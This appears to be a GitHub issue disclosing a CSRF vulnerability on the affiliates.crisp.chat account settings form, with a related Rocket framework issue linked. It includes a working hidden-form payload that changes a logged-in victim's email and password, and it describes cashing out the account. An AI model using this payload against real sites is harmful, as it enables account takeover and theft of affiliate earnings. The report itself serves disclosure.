Open x1ddos opened 4 years ago
Without CSRF, it is possible create a hidden form like this one:
<form method="post" action="https://affiliates.crisp.chat/dashboard/account/form/account/"> <input type="hidden" name="email" value="another@example.org"> <input type="hidden" name="password" value="123"> <input type="hidden" name="notify_balance" value="0"> </form>
then submit it on any user click, on the page where the form is, log in and cash out.
(precondition: account holder needs to be already logged in to affiliates.crisp.chat)
affiliates.crisp.chat
Ref https://github.com/SergioBenitez/Rocket/issues/14
Without CSRF, it is possible create a hidden form like this one:
then submit it on any user click, on the page where the form is, log in and cash out.